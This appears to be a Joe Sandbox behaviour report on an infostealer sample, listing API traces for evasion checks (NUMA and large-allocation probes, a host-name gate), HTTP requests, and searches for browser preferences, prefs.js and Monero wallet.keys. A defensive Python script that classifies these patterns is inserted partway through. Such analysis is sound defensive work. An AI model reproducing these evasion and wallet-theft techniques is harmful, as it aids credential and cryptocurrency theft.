                          • Opcode ID: 156f17488948e83f23429fa38d0a442716a49feed983da466a42606560be1e4e
                          • Instruction ID: 3e0108aea8969ebf7f9e2e3e0620b6b33698e1c4fecdb1dcbe119ef16b602b5b
                          • Opcode Fuzzy Hash: 156f17488948e83f23429fa38d0a442716a49feed983da466a42606560be1e4e
                          • Instruction Fuzzy Hash: 2BF03A70A4020DEEE720AFA09C0ABBD7A34FB04701F25C514FB47A2985CBB59540DA75

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 4e6857663d23f0b1863d7b0a59ee550d48216493039778df99bb7e876f298d99
                          • Instruction ID: 8a7c87730667829017bdf67b6e8d1e08c9453ee098f0a24014299e99f53cf263
                          • Opcode Fuzzy Hash: 4e6857663d23f0b1863d7b0a59ee550d48216493039778df99bb7e876f298d99
                          • Instruction Fuzzy Hash: 6D211FB1D00209ABDF14DFA4E845AEE7B75FF45320F108625FA55A72C0EB746A09CF91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE6280: InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                            • Part of subcall function 00DE6280: StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE6303
                            • Part of subcall function 00DE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                            • Part of subcall function 00DE6280: HttpOpenRequestA.WININET(00000000,GET,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE6385
                            • Part of subcall function 00DE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                            • Part of subcall function 00DE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 11fa6535237faafe645e9c73abaf81ddd6c0f5b547c04f95f826be6b58b38728
                          • Instruction ID: 8299f482215c091760ec78914c1c55964bc9f5ce4960a9e24ec80778791d32ef
                          • Opcode Fuzzy Hash: 11fa6535237faafe645e9c73abaf81ddd6c0f5b547c04f95f826be6b58b38728
                          • Instruction Fuzzy Hash: 69110AB090014CAACB14FF68D952AFD7338EF50340F41C158FA0E5A596EF70AB0AC6B1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DE112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00DE1132
                          • ExitProcess.KERNEL32 ref: 00DE1143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 006a2a3027303f024b81575af62aff2fd5a91c2432c521e7297b1fec1faacdde
                          • Instruction ID: cd3d264b999ae83080c3c26c25ed3f10978f10a5358405ae3fa051df80d7cb73
                          • Opcode Fuzzy Hash: 006a2a3027303f024b81575af62aff2fd5a91c2432c521e7297b1fec1faacdde
                          • Instruction Fuzzy Hash: 95E0E674B45348FFE7306FA19C0AB0D7678EB04B01F204055F709B75C4DAF9264097A9
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00DE10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00DE10F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 5effc5ef2d8bbc05047399315e778d4869b560db53a6114a07da9b2c871f80d4
                          • Instruction ID: c377df6434874f4081a25bf0665ab8614473a71cd170f93be9ddc10e015e77fc
                          • Opcode Fuzzy Hash: 5effc5ef2d8bbc05047399315e778d4869b560db53a6114a07da9b2c871f80d4
                          • Instruction Fuzzy Hash: E0F0E971741208BBE7249AA49C49FBAB7DCE705B15F300444F544E3280D5729E00DB64
                          APIs
                            • Part of subcall function 00DF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                            • Part of subcall function 00DF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                            • Part of subcall function 00DF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                            • Part of subcall function 00DF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                            • Part of subcall function 00DF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                            • Part of subcall function 00DF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                          • ExitProcess.KERNEL32 ref: 00DE11C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: f4b92cb80c78a9f42a3a7001d3d8dfc495f5c6880c0a0199eb9a235b1b1d7d63
                          • Instruction ID: ab1d251a089515670c8e74e2fca8508880186640dc2458443640521f24c8d3ba
                          • Opcode Fuzzy Hash: f4b92cb80c78a9f42a3a7001d3d8dfc495f5c6880c0a0199eb9a235b1b1d7d63
                          • Instruction Fuzzy Hash: 14E012B5B1430997CF347BB1AC0AB3A329CDB14385F194424FB09D3602FE2AE8509679
                          APIs
                          • wsprintfA.USER32 ref: 00DF38CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DF38E3
                          • lstrcat.KERNEL32(?,?), ref: 00DF3935
                          • StrCmpCA.SHLWAPI(?,00E00F70), ref: 00DF3947
                          • StrCmpCA.SHLWAPI(?,00E00F74), ref: 00DF395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF3C67
                          • FindClose.KERNEL32(000000FF), ref: 00DF3C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: f1e6290e2fc369efdad92a24caa63f84ba2f40b313b55d29c4bfeb48040d8186
                          • Instruction ID: f92c9dc85cb33f9e1e48e1dbe2828f98cd93b49ed44fa7524a8fd676ee7182f6
                          • Opcode Fuzzy Hash: f1e6290e2fc369efdad92a24caa63f84ba2f40b313b55d29c4bfeb48040d8186
                          • Instruction Fuzzy Hash: 21A12DB1A00219ABDB34EF64DC85FFA7378FB48300F058588E64E96545EB759B84CF62
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00E00B32,00E00B2B,00000000,?,?,?,00E013F4,00E00B2A), ref: 00DEBEF5
                          • StrCmpCA.SHLWAPI(?,00E013F8), ref: 00DEBF4D
                          • StrCmpCA.SHLWAPI(?,00E013FC), ref: 00DEBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00DEC7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 4457c7ccdd77a548dea6bcb03aff6c06d2b6f9c4574517f70cce42385ad7e56f
                          • Instruction ID: eb3bcdae0a022a120b09685673cd1bc2d7804caa9997727199a3cbffc4fed535
                          • Opcode Fuzzy Hash: 4457c7ccdd77a548dea6bcb03aff6c06d2b6f9c4574517f70cce42385ad7e56f
                          • Instruction Fuzzy Hash: DD4243B19101089BCB14FB64DC56EFE7379EF44300F418558FA0E96195EE74AB49CBB2
                          APIs
                          • wsprintfA.USER32 ref: 00DF492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                          • StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                          • StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                          • FindClose.KERNEL32(000000FF), ref: 00DF4B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 380095d4a5dbc04a29b275ca1f286f20f4c62eb3ae7b897dddab061f427a95b0
                          • Instruction ID: 339d44da82cef558c8e10f6d5863ea18bb12036d7335520e5a9c0009a4c74efe
                          • Opcode Fuzzy Hash: 380095d4a5dbc04a29b275ca1f286f20f4c62eb3ae7b897dddab061f427a95b0
                          • Instruction Fuzzy Hash: 136123B5600219ABCB34EFA0DC45FFA7378BB48700F048588E64A96145EF75DB858FA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DF4580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF4587
                          • wsprintfA.USER32 ref: 00DF45A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DF45BD
                          • StrCmpCA.SHLWAPI(?,00E00FC4), ref: 00DF45EB
                          • StrCmpCA.SHLWAPI(?,00E00FC8), ref: 00DF4601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF468B
                          • FindClose.KERNEL32(000000FF), ref: 00DF46A0
                          • lstrcat.KERNEL32(?,00840CA0), ref: 00DF46C5
                          • lstrcat.KERNEL32(?,0083F268), ref: 00DF46D8
                          • lstrlen.KERNEL32(?), ref: 00DF46E5
                          • lstrlen.KERNEL32(?), ref: 00DF46F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 14f02d25dfa0eb84993d2f095c318582f8ab19344154ba1c993c61b0dddf7f2e
                          • Instruction ID: bf4c2445f627a5dd8345e98d77664f5aeb5024504d2b6fc93d951e502e36dea7
                          • Opcode Fuzzy Hash: 14f02d25dfa0eb84993d2f095c318582f8ab19344154ba1c993c61b0dddf7f2e
                          • Instruction Fuzzy Hash: EC5123B56002189BCB74EF70DC89FEE7378AB58300F408598E64A96184EF75DA848FB1
                          APIs
                          • wsprintfA.USER32 ref: 00DF3EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DF3EDA
                          • StrCmpCA.SHLWAPI(?,00E00FAC), ref: 00DF3F08
                          • StrCmpCA.SHLWAPI(?,00E00FB0), ref: 00DF3F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF406C
                          • FindClose.KERNEL32(000000FF), ref: 00DF4081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: e8520b4b8f4837c8cb3ada460dbeb4ebe3c79c894f8b8331a47ee5a618d61eeb
                          • Instruction ID: 2c512ea902ea89844b1e84b1cf480036bb931db533f3a7c04085db185045886c
                          • Opcode Fuzzy Hash: e8520b4b8f4837c8cb3ada460dbeb4ebe3c79c894f8b8331a47ee5a618d61eeb
                          • Instruction Fuzzy Hash: 24510FB6A00219ABCB34EBA0DC85EFA7378BB44300F548588F75996044DE75EB858F71
                          APIs
                          • wsprintfA.USER32 ref: 00DEED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DEED55
                          • StrCmpCA.SHLWAPI(?,00E01538), ref: 00DEEDAB
                          • StrCmpCA.SHLWAPI(?,00E0153C), ref: 00DEEDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00DEF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: a2fbf02b856bdcb9171906bbdd39cbc8d372ae890657982c64cce3e087f5df3b
                          • Instruction ID: 71b2db4655cba358bf1d4ebcbb55f5ba147223b21216aa91ceb102cf5cd7107e
                          • Opcode Fuzzy Hash: a2fbf02b856bdcb9171906bbdd39cbc8d372ae890657982c64cce3e087f5df3b
                          • Instruction Fuzzy Hash: CFE10FB191111C9ADB24FB64CC52EFE7338EF54340F4581A9B60E66096EE706B8ACF71
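The function records above are easier to triage once the logged stack slots are decoded. Four idioms stand out: the GetCurrentProcess / VirtualAllocExNuma / ExitProcess function (0x7D0 = 2000 bytes, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE, NUMA node 0), the VirtualAlloc / VirtualFree pair that requests 0x17C841C0 = 399,000,000 bytes with PAGE_READWRITE and releases it immediately (MEM_RELEASE), the GetComputerNameA / GetUserNameA function that ends in ExitProcess, and the repeated wsprintfA / FindFirstFileA / StrCmpCA / FindNextFileA / FindClose directory walks with "%s\*"-style patterns. The script below is an added example, not code from the Joe Sandbox report or from the Stealc sample: it parses report lines of this shape into calls, decodes the memory-API constants, and labels each record. Assumptions that are mine: the "---" record separator and the label names; the reading of the five slots logged at GetCurrentProcess (which itself takes no parameters) as the arguments already pushed for the VirtualAllocExNuma that follows; the 256 MiB cut-off for calling an allocation a RAM probe; and the remark that the two StrCmpCA calls per entry are the usual "." / ".." skip, which the report supports only with pointers (00E00F70, 00E00F74), not strings.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: the API lines of four of the function records above,
# with the "Part of subcall function ..." prefixes dropped. "---" is our own
# record separator, not report syntax.
SAMPLE_RECORDS = """
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DE112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00DE1132
ExitProcess.KERNEL32 ref: 00DE1143
---
VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00DE10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00DE10F7
---
GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
ExitProcess.KERNEL32 ref: 00DE11C6
---
wsprintfA.USER32 ref: 00DF38CC
FindFirstFileA.KERNEL32(?,?), ref: 00DF38E3
StrCmpCA.SHLWAPI(?,00E00F70), ref: 00DF3947
StrCmpCA.SHLWAPI(?,00E00F74), ref: 00DF395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00DF3C67
FindClose.KERNEL32(000000FF), ref: 00DF3C7C
"""

# One report line: "<api>.<module>(<slot>,...), ref: <address>"; the
# parenthesised slot list is optional (ExitProcess, wsprintfA have none).
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$")
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE",
             0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
LARGE_ALLOC_BYTES = 256 * 1024 * 1024  # assumed cut-off for a "how much RAM" probe

def parse_args(text: Optional[str]) -> List[Optional[int]]:
    """Logged stack slots -> ints; '?' and string literals become None."""
    return [int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None
            for tok in (text or "").split(",") if tok]

def decode_flags(value: Optional[int], table: Dict[int, str]) -> str:
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)

def parse_record(block: str) -> List[dict]:
    matches = (CALL_RE.match(line) for line in block.strip().splitlines())
    return [{"api": m["api"], "mod": m["mod"], "args": parse_args(m["args"]), "ref": m["ref"]}
            for m in matches if m]

def classify(calls: List[dict]) -> dict:
    apis = [c["api"] for c in calls]
    first = {c["api"]: c for c in reversed(calls)}  # first occurrence of each API
    # 1. NUMA probe. GetCurrentProcess takes no parameters, so the five slots
    #    logged at that call are the ones already pushed for the following
    #    VirtualAllocExNuma (lpAddress, dwSize, flAllocationType, flProtect,
    #    nndPreferred); hProcess is pushed last, once GetCurrentProcess returns.
    if {"GetCurrentProcess", "VirtualAllocExNuma", "ExitProcess"} <= set(apis):
        a = first["GetCurrentProcess"]["args"]
        if len(a) >= 5:
            return {"label": "numa_alloc_probe", "size": a[1], "node": a[4],
                    "type": decode_flags(a[2], MEM_FLAGS),
                    "protect": decode_flags(a[3], PAGE_PROT)}
    # 2. Huge VirtualAlloc released straight away: the call result is used as
    #    a pass/fail signal, not as a buffer.
    if {"VirtualAlloc", "VirtualFree"} <= set(apis):
        a, f = first["VirtualAlloc"]["args"], first["VirtualFree"]["args"]
        if len(a) >= 4 and a[1] is not None and a[1] >= LARGE_ALLOC_BYTES:
            return {"label": "large_alloc_probe", "size": a[1],
                    "type": decode_flags(a[2], MEM_FLAGS),
                    "protect": decode_flags(a[3], PAGE_PROT),
                    "free": decode_flags(f[2], MEM_FLAGS) if len(f) > 2 else "?"}
    # 3. Computer/user name read, then ExitProcess in the same function: a
    #    gate on host identity (the values it compares against are not logged).
    lookups = [x for x in ("GetComputerNameA", "GetUserNameA") if x in apis]
    if lookups and "ExitProcess" in apis:
        return {"label": "host_identity_gate", "lookups": lookups}
    # 4. FindFirstFileA/FindNextFileA/FindClose loop; the two StrCmpCA calls
    #    per entry are typically the "." / ".." skip, but only pointers are logged.
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= set(apis):
        return {"label": "directory_walk", "compares": apis.count("StrCmpCA"),
                "pattern_built": "wsprintfA" in apis}
    return {"label": "unclassified"}

def classify_report(text: str) -> List[dict]:
    """Split on our '---' separator and classify every record."""
    return [classify(parse_record(b)) for b in text.split("---") if b.strip()]

if __name__ == "__main__":
    for verdict in classify_report(SAMPLE_RECORDS):
        print(verdict)
```

Two caveats when reusing this on other records: the argument lists are stack snapshots at the call site, so a value is only meaningful where the calling convention puts that parameter (the GetCurrentProcess line is the clearest case of slots belonging to a later call), and the labels say nothing about the branch taken after the call; the report shows ExitProcess in the same function, not the condition under which it is reached.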
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E015B8,00E00D96), ref: 00DEF71E
                          • StrCmpCA.SHLWAPI(?,00E015BC), ref: 00DEF76F
                          • StrCmpCA.SHLWAPI(?,00E015C0), ref: 00DEF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00DEFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 510cc5aec4019a64ab1a5c43cb20a3cd950a5faf1e5969ab966134be55378e64
                          • Instruction ID: b4b45876fc47bef5d8aad456dfd2339c5e6b95d1847a2a80951bbe4b2c223884
                          • Opcode Fuzzy Hash: 510cc5aec4019a64ab1a5c43cb20a3cd950a5faf1e5969ab966134be55378e64
                          • Instruction Fuzzy Hash: A2B131B19001189BCB24FF64DC95AFD7379EF54300F41C1A8A50E9A185EE706B49CBB1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Gr$12&}$?E#a$Xbkw$ZN1'$^__$igO]$v;$!${}}$|,^w$/w
                          • API String ID: 0-2742724478
                          • Opcode ID: d93f72923cc64e00bd76540348d9f29dd8f5d09c1812936b069db19197a9d216
                          • Instruction ID: c6cac108c955ea07d54f6e742fc1c8393a2645921b7f3c7efe08b90ec8d56faa
                          • Opcode Fuzzy Hash: d93f72923cc64e00bd76540348d9f29dd8f5d09c1812936b069db19197a9d216
                          • Instruction Fuzzy Hash: A3B2E6B360C314AFE3046E2DEC85A6AFBE9EF94620F1A493DE6C4C3744E67558018796
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E0510C,?,?,?,00E051B4,?,?,00000000,?,00000000), ref: 00DE1923
                          • StrCmpCA.SHLWAPI(?,00E0525C), ref: 00DE1973
                          • StrCmpCA.SHLWAPI(?,00E05304), ref: 00DE1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DE1D40
